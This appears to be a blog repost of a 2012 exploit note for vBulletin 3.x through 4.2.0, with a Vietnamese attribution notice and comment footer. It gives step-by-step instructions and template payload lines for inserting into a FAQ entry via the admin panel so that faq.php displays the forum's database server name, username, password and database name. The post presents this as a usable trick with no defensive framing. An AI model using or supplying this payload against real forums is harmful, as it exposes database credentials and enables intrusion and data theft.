vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick


Go to acp, Faq Manager and then edit a FAQ, add the following code:

{$vbulletin->config['MasterServer']['servername']}
{$vbulletin->config['MasterServer']['username']}
{$vbulletin->config['MasterServer']['password']}
{$vbulletin->config['Database']['dbname']}

Save it.
Go to http://[path]/faq.php and check it
# 1337day.com [2012-12-07]

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương